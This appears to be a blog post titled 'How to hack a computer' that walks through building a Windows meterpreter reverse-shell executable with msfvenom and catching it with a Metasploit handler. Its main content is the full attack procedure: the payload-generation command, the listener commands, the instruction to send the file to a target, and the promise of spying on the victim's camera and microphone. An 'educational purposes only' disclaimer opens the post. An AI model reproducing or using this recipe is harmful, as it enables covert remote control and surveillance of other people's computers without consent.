How to hack a computer

0

Warning : Before we start this article,  we would like to inform you that this article is intended for educational purposes only. We do not sanction the malicious use of the information we are sharing. Please do not use it to hack someone else's device . You will only be responsible if you try to access someone else's system.




So we are going to do this in two parts .

Part 1 : Set up your kali linux machine to attack a target .

Part 2 : Attack the target machine using metasploit framework.


Part 1 : Set up your Kali Linux -

1. Open the terminal .

2. Now find your ipaddress by typing  ifconfig
 
Your ip address will be like  192.164.xxx.xxx , it could be anything .

3. Now type this command :

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST-YourIPAddress LPORT-4444 -o /root/exploit.exe


4. Now go to the folder section and then go to root you will find your vulnerable app which is This exploit.exe



5. Now your exe is ready to be transferred to the target machine .



Part 2 : Attack the target machine

1. Send this file to the target machine .

2. Open your terminal and type msfconsole

3. Type use exploit/multi/handler

4. Type set payload windows/meterpreter/reverse_tcp

5. Type set LHOST YourIPAddress

6. Type set LPORT  4444

7. Type exploit 

So from now if anyone from the other side try to open that exe file then our session we be started .
You can monitor each and every activity of the target computer like camera , microphone etc.







Post a Comment

0Comments
Post a Comment (0)

#buttons=(Accept !) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Accept !